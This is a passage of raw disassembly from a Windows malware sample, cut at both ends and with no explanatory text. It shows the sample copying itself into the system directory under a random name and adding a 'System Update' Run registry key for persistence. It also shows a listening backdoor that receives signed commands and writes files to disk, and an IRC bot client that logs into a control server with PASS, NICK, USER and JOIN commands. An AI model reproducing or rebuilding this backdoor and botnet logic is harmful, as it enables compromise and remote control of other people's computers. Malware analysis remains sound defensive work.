add esp, 10h
loc_315025C3: ; CODE XREF: sub_31502523+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_3150258C
pop edi
pop esi
pop ebx
leave
retn
sub_31502523 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315025D1 proc near ; CODE XREF: sub_3150269D+D1�p
; sub_3150269D+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_315025E6
push [ebp+arg_0]
call dword_31501098 ; DeleteFileA
loc_315025E6: ; CODE XREF: sub_315025D1+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31501068 ; GetSystemDirectoryA
test eax, eax
jz locret_3150269B
push esi
call dword_31501124 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31501932
mov esi, dword_3150106C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push offset asc_31505CE0 ; "\\"
push eax
call esi ; lstrcat
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31501070 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_315010A0 ; lstrlen
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_31502418
add esp, 14h
push ds:dword_31506154
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31501074 ; WinExec
push 1F4h
call dword_315010A4 ; Sleep
push 0
call dword_315010F0 ; ExitProcess
pop esi
locret_3150269B: ; CODE XREF: sub_315025D1+23�j
leave
retn
sub_315025D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150269D proc near ; CODE XREF: UPX0:31501D57�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31501060 ; GetModuleFileNameA
test eax, eax
jz loc_315027D6
and ds:dword_31506190, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_315023BF
add esp, 14h
test eax, eax
jz short loc_31502723
call dword_31501124 ; rand
push 0Ah
mov ebx, offset aPpjehfeqfkiykw ; "ppjehfeqfkiykwer"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31501932
pop ecx
pop ecx
push ebx
call dword_315010A0 ; lstrlen
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_31502418
add esp, 14h
jmp short loc_31502732
; ---------------------------------------------------------------------------
loc_31502723: ; CODE XREF: sub_3150269D+4D�j
lea eax, [ebp+var_20]
push eax
push offset aPpjehfeqfkiykw ; "ppjehfeqfkiykwer"
call dword_31501088 ; lstrcpy
loc_31502732: ; CODE XREF: sub_3150269D+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_315023BF
add esp, 14h
test eax, eax
jz short loc_31502778
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_31502418
lea eax, [ebp+var_84]
push eax
push 0
call sub_315025D1
add esp, 1Ch
jmp short loc_315027D6
; ---------------------------------------------------------------------------
loc_31502778: ; CODE XREF: sub_3150269D+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_31501064 ; lstrcmpi
test eax, eax
jnz short loc_315027C1
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_315023BF
add esp, 14h
test eax, eax
jnz short loc_315027D6
push ebx
push edi
push esi
mov ds:dword_31506190, 1
call sub_3150238A
add esp, 0Ch
jmp short loc_315027D6
; ---------------------------------------------------------------------------
loc_315027C1: ; CODE XREF: sub_3150269D+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_315025D1
pop ecx
pop ecx
loc_315027D6: ; CODE XREF: sub_3150269D+1F�j
; sub_3150269D+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_3150269D endp
; =============== S U B R O U T I N E =======================================
sub_315027DB proc near ; CODE XREF: sub_31501B9B+7A�p
; sub_31502889+2A�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_3150105C ; VirtualAlloc
retn
sub_315027DB endp
; =============== S U B R O U T I N E =======================================
sub_315027EF proc near ; CODE XREF: sub_31502889+EB�p
; sub_31502B27+75�p ...
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31501058 ; VirtualFree
retn
sub_315027EF endp
; =============== S U B R O U T I N E =======================================
sub_31502801 proc near ; CODE XREF: sub_31502B27+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
and dword ptr [esi], 0
lea eax, [esi+4]
push eax
call dword_31501088 ; lstrcpy
mov eax, esi
pop esi
retn
sub_31502801 endp
; =============== S U B R O U T I N E =======================================
sub_3150281A proc near ; CODE XREF: sub_31502B27+3A�p
push ebx
push ebp
mov ebx, dword_31501018
push esi
push edi
xor ebp, ebp
mov edi, ecx
push ebp
push 1
push ebp
lea esi, [edi+0Eh]
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_31502849
push 8
push 1
push ebp
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_31502849
push 1
pop eax
jmp short loc_31502869
; ---------------------------------------------------------------------------
loc_31502849: ; CODE XREF: sub_3150281A+1B�j
; sub_3150281A+28�j
add edi, 12h
push edi
push ebp
push ebp
push 114h
push offset dword_31505CE8
push dword ptr [esi]
call dword_3150101C ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_31502869: ; CODE XREF: sub_3150281A+2D�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_3150281A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150286E proc near ; CODE XREF: sub_31502B27+7E�p
push esi
mov esi, ecx
push dword ptr [esi+12h]
call dword_31501010 ; CryptDestroyKey
push 0
push dword ptr [esi+0Eh]
call dword_31501014 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3150286E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502889 proc near ; CODE XREF: sub_31502B27+46�p
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_8], ecx
push eax
call dword_31501050 ; GetSystemTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_28]
push eax
call dword_31501054 ; SystemTimeToFileTime
mov esi, 4000h
push esi
call sub_315027DB
mov ebx, [ebp+arg_0]
pop ecx
mov edi, eax
push 0
push esi
push edi
push dword ptr [ebx]
call dword_315011A0 ; recv
lea esi, [edi+8]
push 8
lea eax, [ebp+var_10]
push esi
push eax
call sub_31503A1E ; memcpy
mov ecx, [ebp+var_10]
mov eax, [ebp+var_C]
add esp, 0Ch
sub ecx, [ebp+var_18]
sbb eax, [ebp+var_14]
cmp eax, 8
jg short loc_3150296A
jl short loc_315028F7
cmp ecx, 61C46800h
ja short loc_3150296A
loc_315028F7: ; CODE XREF: sub_31502889+64�j
cmp eax, 0FFFFFFF7h
jl short loc_3150296A
jg short loc_31502906
cmp ecx, 9E3B9800h
jb short loc_3150296A
loc_31502906: ; CODE XREF: sub_31502889+73�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push 0
push 0
push 8003h
push dword ptr [eax+0Eh]
call dword_31501000 ; CryptCreateHash
test eax, eax
jz short loc_3150295B
push 0
push 8
push esi
push [ebp+var_4]
call dword_31501004 ; CryptHashData
test eax, eax
jz short loc_3150295B
mov eax, [edi+10h]
cmp eax, 2800h
ja short loc_3150295B
mov ecx, [ebp+var_8]
xor esi, esi
push esi
push esi
push dword ptr [ecx+12h]
push eax
lea eax, [edi+14h]
push eax
push [ebp+var_4]
call dword_31501008 ; CryptVerifySignatureA
test eax, eax
jnz short loc_31502983
loc_3150295B: ; CODE XREF: sub_31502889+98�j
; sub_31502889+AA�j ...
call dword_3150109C ; RtlGetLastWin32Error
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
loc_3150296A: ; CODE XREF: sub_31502889+62�j
; sub_31502889+6C�j ...
call dword_3150109C ; RtlGetLastWin32Error
push 2
pop esi
loc_31502973: ; CODE XREF: sub_31502889+117�j
push edi
call sub_315027EF
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31502983: ; CODE XREF: sub_31502889+D0�j
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
call dword_31501124 ; rand
push esi
push 4
push edi
mov [edi], eax
push dword ptr [ebx]
call dword_3150119C ; send
jmp short loc_31502973
sub_31502889 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315029A2 proc near ; CODE XREF: sub_31502B27+6A�p
var_220 = byte ptr -220h
var_118 = byte ptr -118h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 220h
cmp [ebp+arg_8], 8
push ebx
push esi
push edi
jge short loc_315029C1
push 0
push [ebp+arg_8]
push [ebp+arg_4]
jmp loc_31502B19
; ---------------------------------------------------------------------------
loc_315029C1: ; CODE XREF: sub_315029A2+10�j
mov esi, [ebp+arg_4]
mov ebx, 104h
mov eax, [esi]
lea edi, [esi+8]
test eax, eax
mov [ebp+arg_4], eax
jnz loc_31502AD2
lea eax, [ebp+var_220]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_220]
push eax
call dword_31501048 ; SetCurrentDirectoryA
mov eax, [edi]
push ebx
mov [ebp+arg_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
lea eax, [edi+8]
push eax
lea eax, [ebp+var_118]
push eax
call dword_315010A8 ; lstrcpyn
xor eax, eax
push eax
push eax
push 2
push eax
push eax
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_315010EC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_31502AC0
mov ebx, dword_3150119C
push 0
push 8
push esi
push [ebp+arg_0]
mov dword ptr [esi+4], 1
call ebx ; send
mov eax, [ebp+arg_8]
xor edx, edx
div [ebp+var_4]
xor edx, edx
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
div [ebp+var_4]
test edx, edx
jz short loc_31502A68
inc [ebp+arg_4]
loc_31502A68: ; CODE XREF: sub_315029A2+C1�j
and [ebp+var_8], 0
cmp [ebp+arg_4], 0
jle short loc_31502AB5
loc_31502A72: ; CODE XREF: sub_315029A2+111�j
push 0
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jz short loc_31502AB5
lea ecx, [ebp+var_10]
push 0
push ecx
push eax
push edi
push [ebp+var_C]
call dword_3150104C ; WriteFile
mov eax, [ebp+arg_8]
push 0
push 8
push esi
push [ebp+arg_0]
mov [esi+4], eax
call ebx ; send
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jl short loc_31502A72
loc_31502AB5: ; CODE XREF: sub_315029A2+CE�j
; sub_315029A2+E5�j
push [ebp+var_C]
call dword_315010BC ; CloseHandle
jmp short loc_31502B22
; ---------------------------------------------------------------------------
loc_31502AC0: ; CODE XREF: sub_315029A2+8F�j
and dword ptr [esi+4], 0
push 0
push 8
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502AD2: ; CODE XREF: sub_315029A2+31�j
cmp [ebp+arg_4], 1
jnz short loc_31502B01
lea eax, [ebp+var_118]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_118]
push eax
call dword_31501048 ; SetCurrentDirectoryA
push 0
push 4
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B01: ; CODE XREF: sub_315029A2+134�j
cmp [ebp+arg_4], 3
jnz short loc_31502B22
push dword ptr [edi]
add edi, 4
push edi
call sub_31501962
pop ecx
pop ecx
push 0
push 4
push esi
loc_31502B19: ; CODE XREF: sub_315029A2+1A�j
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B22: ; CODE XREF: sub_315029A2+11C�j
; sub_315029A2+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_315029A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502B27 proc near ; DATA XREF: sub_31502BC3+AA�o
var_30 = dword ptr -30h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
call sub_315018BA
mov esi, [ebp+arg_0]
push 6
pop ecx
lea edi, [ebp+var_30]
rep movsd
push [ebp+var_1C]
call dword_315010D8 ; SetEvent
mov esi, 10000h
push esi
call sub_315027DB
pop ecx
mov edi, eax
lea ecx, [ebp+var_18]
call sub_31502801
lea ecx, [ebp+var_18]
call sub_3150281A
lea eax, [ebp+var_30]
lea ecx, [ebp+var_18]
push eax
call sub_31502889
test eax, eax
jnz short loc_31502B9B
loc_31502B76: ; CODE XREF: sub_31502B27+72�j
push 0
push esi
push edi
push [ebp+var_30]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_31502B9B
test eax, eax
jz short loc_31502B9B
push eax
push edi
push [ebp+var_30]
call sub_315029A2
add esp, 0Ch
jmp short loc_31502B76
; ---------------------------------------------------------------------------
loc_31502B9B: ; CODE XREF: sub_31502B27+4D�j
; sub_31502B27+5F�j ...
push edi
call sub_315027EF
pop ecx
lea ecx, [ebp+var_18]
call sub_3150286E
push [ebp+var_30]
call dword_315011A8 ; closesocket
push 0
call dword_315010E0 ; ExitThread
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_31502B27 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_31502BC3 proc near ; DATA XREF: sub_31501D89+13E�o
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_3150118C ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_31503A12 ; memset
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], esi
loc_31502BF4: ; CODE XREF: sub_31502BC3+59�j
lea eax, [esi+0BFBh]
push eax
call dword_31501194 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_31501170 ; bind
test eax, eax
jz short loc_31502C1E
inc esi
cmp esi, 0Ah
jl short loc_31502BF4
loc_31502C1E: ; CODE XREF: sub_31502BC3+53�j
push 32h
push [ebp+var_4]
call dword_31501174 ; listen
mov ebx, dword_315010BC
loc_31502C2F: ; CODE XREF: sub_31502BC3+CD�j
lea eax, [ebp+var_8]
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+var_4]
call dword_31501178 ; accept
lea esi, [ebp+var_2C]
lea edi, [ebp+var_40]
mov [ebp+var_44], eax
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push 1
push esi
call dword_31501090 ; CreateEventA
mov [ebp+var_30], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_44]
push esi
push eax
push offset sub_31502B27
push esi
push esi
call dword_315010D0 ; CreateThread
push eax
call ebx ; CloseHandle
push 3E8h
push [ebp+var_30]
call dword_31501094 ; WaitForSingleObject
push [ebp+var_30]
call ebx ; CloseHandle
jmp short loc_31502C2F
sub_31502BC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502C92 proc near ; CODE XREF: sub_31502D17+25�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31502CC5
add ebx, 1Ah
loc_31502CC5: ; CODE XREF: sub_31502C92+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31501110
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31502CEF
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31502D12
; ---------------------------------------------------------------------------
loc_31502CEF: ; CODE XREF: sub_31502C92+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31502D0F
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31502D12
; ---------------------------------------------------------------------------
loc_31502D0F: ; CODE XREF: sub_31502C92+68�j
mov al, [ebp+arg_0]
loc_31502D12: ; CODE XREF: sub_31502C92+5B�j
; sub_31502C92+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31502C92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502D17 proc near ; CODE XREF: sub_315036FD+F7�p
; sub_315036FD+137�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_31502D72
mov edi, [ebp+arg_0]
push ebx
loc_31502D2C: ; CODE XREF: sub_31502D17+56�j
mov bl, al
inc [ebp+arg_4]
mov eax, esi
mov byte ptr [ebp+arg_0], bl
neg eax
push eax
push [ebp+arg_0]
call sub_31502C92
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_31502D56
cmp bl, 7Ah
jg short loc_31502D56
movsx esi, bl
sub esi, 61h
loc_31502D56: ; CODE XREF: sub_31502D17+32�j
; sub_31502D17+37�j
cmp bl, 41h
jl short loc_31502D66
cmp bl, 5Ah
jg short loc_31502D66
movsx esi, bl
sub esi, 41h
loc_31502D66: ; CODE XREF: sub_31502D17+42�j
; sub_31502D17+47�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_31502D2C
pop ebx
jmp short loc_31502D75
; ---------------------------------------------------------------------------
loc_31502D72: ; CODE XREF: sub_31502D17+F�j
mov edi, [ebp+arg_0]
loc_31502D75: ; CODE XREF: sub_31502D17+59�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31502D17 endp
; =============== S U B R O U T I N E =======================================
sub_31502D7C proc near ; CODE XREF: UPX0:31503449�p
push esi
mov esi, ecx
push 20001h
call sub_315027DB
mov [esi+2Ch], eax
pop ecx
mov eax, esi
pop esi
retn
sub_31502D7C endp
; =============== S U B R O U T I N E =======================================
sub_31502D91 proc near ; CODE XREF: UPX0:315034A9�p
; UPX0:315034FC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push 27h
push [esp+8+arg_0]
lea eax, [esi+4]
push eax
call dword_315010A8 ; lstrcpyn
mov eax, [esp+4+arg_4]
mov [esi+58h], eax
pop esi
retn 8
sub_31502D91 endp
; ---------------------------------------------------------------------------
loc_31502DAF: ; CODE XREF: UPX0:31503AB6�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_315027EF
push dword ptr [esi+2Ch]
call sub_315027EF
pop ecx
pop ecx
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_31502DC7 proc near ; CODE XREF: UPX0:315034C7�p
; UPX0:3150351A�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push 1
mov esi, ecx
push 2
call dword_3150118C ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_315019B8
mov [esi+64h], eax
mov ax, [esi+58h]
pop ecx
lea edi, [esi+60h]
push eax
mov word ptr [edi], 2
call dword_31501194 ; htons
push 10h
push edi
push dword ptr [esi+5Ch]
mov [esi+62h], ax
call dword_31501198 ; connect
test eax, eax
jnz loc_31502FCC
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FCC
mov ecx, [esi+2Ch]
and [ecx+eax], bl
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
lea eax, [esp+148h+var_138]
push 9
push eax
call sub_31501932
mov ebp, dword_3150113C
lea eax, [esp+150h+var_138]
push eax
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; wsprintfA
mov edi, dword_315010A4
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push ebx
mov ebx, dword_315010A0
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push [esp+148h+arg_0]
lea eax, [esp+14Ch+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FCC
mov ecx, [esi+2Ch]
push 64h
and byte ptr [ecx+eax], 0
call edi ; Sleep
loc_31502EF0: ; CODE XREF: sub_31502DC7+1AD�j
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
push offset aAlready ; "already"
push dword ptr [esi+2Ch]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31502F79
push [esp+148h+arg_4]
push [esp+14Ch+arg_0]
call sub_31501932
push [esp+150h+arg_0]
lea eax, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31502FCC
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
jmp loc_31502EF0
; ---------------------------------------------------------------------------
loc_31502F79: ; CODE XREF: sub_31502DC7+145�j
push [esp+148h+arg_8]
lea eax, [esp+14Ch+var_12C]
push [esp+14Ch+arg_0]
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; wsprintfA
add esp, 10h
push 64h
call edi ; Sleep
xor edi, edi
lea eax, [esp+148h+var_12C]
push edi
push eax
call ebx ; lstrlen
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push edi
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_31502FDA
loc_31502FCC: ; CODE XREF: sub_31502DC7+4E�j
; sub_31502DC7+6B�j ...
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
push 1
pop eax
jmp short loc_31502FFC
; ---------------------------------------------------------------------------
loc_31502FDA: ; CODE XREF: sub_31502DC7+203�j
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
mov [esi+284h], edi
mov [esi+7Ch], edi
mov [esi+70h], edi
mov [esi+74h], edi
xor eax, eax
loc_31502FFC: ; CODE XREF: sub_31502DC7+211�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 138h
retn 0Ch
sub_31502DC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503009 proc near ; CODE XREF: sub_31502DC7+7C�p
; sub_31502DC7+12E�p ...
var_190 = byte ptr -190h
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
push [ebp+arg_0]
mov ebx, ecx
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503083
mov esi, dword_315010A0
lea edi, [eax+4]
push edi
call esi ; lstrlen
dec eax
cmp eax, 63h
jle short loc_31503042
push 1
pop eax
jmp short loc_31503085
; ---------------------------------------------------------------------------
loc_31503042: ; CODE XREF: sub_31503009+32�j
push eax
lea eax, [ebp+var_64]
push edi
push eax
call dword_315010A8 ; lstrcpyn
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_190]
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_190]
push 0
push eax
call esi ; lstrlen
push eax
lea eax, [ebp+var_190]
push eax
push dword ptr [ebx+5Ch]
call dword_3150119C ; send
loc_31503083: ; CODE XREF: sub_31503009+20�j
xor eax, eax
loc_31503085: ; CODE XREF: sub_31503009+37�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31503009 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150308C proc near ; CODE XREF: UPX0:31503568�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 12Ch
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12C]
mov esi, ecx
push offset aJoinS ; "JOIN %s\r\n"
push eax
call dword_3150113C ; wsprintfA
mov edi, dword_315010A4
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call dword_315010A0 ; lstrlen
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 64h
call edi ; Sleep
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
and byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_31503155
test eax, eax
jz short loc_31503155
push 64h
call edi ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
mov edi, dword_31501120
push offset a451 ; "451"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3150312E
push 3
jmp short loc_31503157
; ---------------------------------------------------------------------------
loc_3150312E: ; CODE XREF: sub_3150308C+9C�j
push offset aPing ; "PING"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503142
push 4
jmp short loc_31503157
; ---------------------------------------------------------------------------
loc_31503142: ; CODE XREF: sub_3150308C+B0�j
push 23h
add esi, 30h
push [ebp+arg_0]
push esi
call dword_315010A8 ; lstrcpyn
xor eax, eax
jmp short loc_31503158
; ---------------------------------------------------------------------------
loc_31503155: ; CODE XREF: sub_3150308C+74�j
; sub_3150308C+78�j
push 2
loc_31503157: ; CODE XREF: sub_3150308C+A0�j
; sub_3150308C+B4�j
pop eax
loc_31503158: ; CODE XREF: sub_3150308C+C7�j
pop edi
pop esi
leave
retn 4
sub_3150308C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150315E proc near ; CODE XREF: sub_315031C7+83�p
; UPX0:315035C4�p
var_14C = byte ptr -14Ch
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 14Ch
push esi
mov esi, ecx
call dword_31501124 ; rand
sub eax, 3
and eax, 7
